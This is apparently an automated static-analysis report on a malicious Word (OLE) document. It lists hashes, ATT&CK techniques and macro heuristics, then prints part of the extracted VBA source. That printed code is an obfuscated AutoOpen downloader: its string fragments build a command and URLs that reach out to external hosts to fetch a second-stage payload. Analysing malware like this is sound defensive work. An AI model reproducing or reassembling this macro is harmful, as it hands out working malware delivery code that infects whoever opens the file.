Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 323c2d083d5a0ade…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 92.5 KB
First seen: 2018-02-19
MD5: d2cf165ddec1e67ec5af5dd13efcc34b
SHA-1: 902f6740992bd0bb7d8e500538ffe1dc9665fb29
SHA-256: 323c2d083d5a0ade4b9a265e290cc2460c4e968e963002fe9261dca97ef22d7e
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The critical OLE_VBA_SHELL heuristic fires on this sample, indicating a Shell() call within its VBA macros. An AutoOpen macro is present and configured to execute code when the document is opened, likely to download and run a second-stage payload. The script builds a URL by concatenating strings, which resolves to 'https://doh.erschdh.com/ly4Ivh/?hsRI0'. This suggests a macro-based downloader attack vector.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23010 bytes
SHA-256: fafbddca4b62db8ef2886d028a932845a40219e3014d9d1e06afc6a987b8096b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WKKSBPVM"
Sub AutoOpen()
On Error Resume Next
RzNhZROkI = MmZZTwUY - Sgn(VwmflLUduj) - (4092526 - Tan(698911) / 3921852 - ChrW(JJUvw))
ihDVCwkqZ = LGLUDmJfRcWF - Sgn(UDmUrdPQwAWp) - (9680786 - Tan(3366212) / 5502709 - ChrW(jAUunjZJjRW))
AiDTbdtjS = bsNJaM - Sgn(piEV) - (6238754 - Tan(9128481) / 6632348 - ChrW(BKAlddlaG))
Application.Run "PWTJXiaCZRH", FYHzWHSzzfPdSb
OlvjuMEiK = HHHlNWT - Sgn(EMBUiUr) - (4937825 - Tan(3635478) / 8641161 - ChrW(omqSGuoRZvSAnV))
bbTuZnOKJ = OEuCaoUtLj - Sgn(hQpAqYFt) - (4742490 - Tan(7369837) / 2323355 - ChrW(wHtYit))
FjidJDCAl = kaYoDAtKiujO - Sgn(QkuCq) - (9199018 - Tan(9122954) / 6386699 - ChrW(pAGArE))
End Sub
Function FYHzWHSzzfPdSb()
On Error Resume Next
wsPLwotAlOc = NnSSI - Sgn(WMA) - (3115549 - Tan(2552050) / 3181746 - ChrW(twXcEiGP))
EHDFYRp = PdFSjzRS - Sgn(EaQHm) - (7284330 - Tan(5294771) / 2995477 - ChrW(TUwWO))
LIlWo = LaEOdaPbv - Sgn(XoNqRWviGIqE) - (7309724 - Tan(2406629) / 7294194 - ChrW(oTm))
dUjGtj = EYowIbV + Mid(EuYLphzm + "wwWzRYiADH+NUjIAQIWrTcPDcV" + rhUCmGiuh, 11, 1)
YzJTrv = dlvoARiZj - Sgn(IbsuWTrjUzo) - (7491510 - Tan(2967048) / 5016080 - ChrW(VIdIuzUDZKzt))
RWiRU = UzkXi - Sgn(lUjVtmsXUtoq) - (4299998 - Tan(4185410) / 9719101 - ChrW(JBRpkoXTkZ))
VMZAMqfLu = hOVNRIZoV - Sgn(njVBbzJlUbXL) - (7905401 - Tan(8058834) / 6806436 - ChrW(pFzw))
wPGLdNhC = YtOiGIvCojpwVR + Mid(zNZtwZ + "uQGRSR+sRI'+'h0E+s'+'RI+sRIh0E/MoGJD/?httph0E+h0E://doh0E+h0Erschdh0E'+'+h0Ei.com/ly4Ivh0E+h0E/'+'h0E+h0E?hsRI+sRI0E+h0Ehtth0E+sRI+sRIh0Ep:'+'//ww'+'w.hopadih0E+shpwtnhq" + QGkHor, 7, 156)
fuJCXACjqY = CPJpTBdPm - Sgn(qiwTSKBzJi) - (6096383 - Tan(4142255) / 4339386 - ChrW(oiTCK))
DffzmFIRS = cpDOUB - Sgn(wpnkScTMnbL) - (2255052 - Tan(307314) / 3532771 - ChrW(iqwjszAk))
IYEAjcFDiL = aEYCAikzQX - Sgn(IVz) - (2547210 - Tan(8574088) / 678795 - ChrW(BHHrIvFHNSnInz))
XcfMjzzi = lUMLIwjWh + Mid(hcqWRvnIoOhPzC + "aBiiJRtqEBufQlh0EDHyenh0E+h0Ev:p'+'nmuXwNLujWtwbj" + ZfdLTUrY, 15, 21)
MFkNMERjqHM = kFDQ - Sgn(zomkrRvvijqv) - (4076938 - Tan(6849526) / 9933157 - ChrW(lzcfbSb))
jDzGZKZCrXA = TsYAotJ - Sgn(vEjzC) - (3354834 - Tan(1593395) / 2201562 - ChrW(nQwFwviMo))
qqzWY = IakMhMSQzsvHlW - Sgn(zQAzQTpQBn) - (258394 - Tan(6076461) / 2784786 - ChrW(wqnzuBkL))
smOlX = FKNEQMJ + Mid(MvdPOMsinpCz + "oprzLZWZVlqhREPGF+h0EU.Nd5DoyP4WnlyP4OasRI+sRIdFIh0E+h0EyP4leNd5(DHh0E+h0Ey'+'ah0EsRI+sRI+h0Esh0E+h0Efc.Nd5Toh0E+h0KsRI+'+'sRIRh+KRhESh0EKRh+KRh+h'+'0EtryPKRh+mTriVvASufszVzqjHZ" + ZjvcwsQRL, 18, 142)
qzRNDnOz = zTHVGoaRIb - Sgn(OiadTWGjG) - (1330051 - Tan(3384305) / 5225417 - ChrW(oEiIHjAq))
XbIpNB = nMPRK - Sgn(PTktficnU) - (2133769 - Tan(832844) / 5402378 - ChrW(AMZj))
YHCidWvF = jhCJRJYbmBvNN - Sgn(MjQ) - (7598543 - Tan(4214893) / 4715034 - ChrW(tLRKzDHuqAOjX))
zVBuIqwMLP = CnkAJTijfZawf + Mid(MXfTKiZfjE + "uFpiMbzujhuPnJEzBRimlWE(h0EA0Gh0E,h0'+'E2oUh0E).replaCE(([cHArsRI+sRI]121'+'+sRI+sRI[cHAr]80+[cHAr]sRI+sRI52),[SKRh+KRhtrinG][cHAr]'+'96).replaCE(([cHAr]68+['+'cHAr]KRh+KR'+'h72+VAPDCRmciPPYIid" + CBHHrVvoXwMjT, 23, 156)
ObvWQK = QjvB - Sgn(hqTjHJluEq) - (111505 - Tan(7109476) / 4856626 - ChrW(AAr))
chwKHqwBYHB = FcLYatG - Sgn(HiVDXwZKZGjj) - (3348499 - Tan(5043304) / 7494091 - ChrW(DGol))
joBsf = wTFZL - Sgn(ZWIQadUCDZAS) - (701861 - Tan(2215164) / 2791718 - ChrW(uRLEfpCVU))
zQmluKVlL = cYGBbUEsarHz + Mid(QZk + "jIrChmDjfmwpU[cHAr]12KRh+KsRI+sRIRh1),[StrinG][cH'+'Ar]36).rep'+'laCE(sRI+sRI([cHAKRh+KRhr]82+[csRI+sRIHAr]'+'117+sRI+sRI[sRI+sRIcsRI+sRIHKRh+KRhAr]106),[StrinG][cHAr]39'+'KRh'+'+KRh) ) KRh)  -crEpLAce tjjGzw" + DHwpWlzT, 14, 189)
VFklu = nlZ - Sgn(TZoNHKkTnwVIss) - (7873632 - Tan(1914229) / 4281161 - ChrW(wLZM))
COUjSJOXkKn = HIH - Sgn(FTSj) - (3612945 - Tan(9146598) / 5855012 - ChrW(pbQFwQVitnuEf))
rEBIWuqa = ZjhoOXGVjEABi - Sgn(UQD) - (2473442 - Tan(273
... (truncated)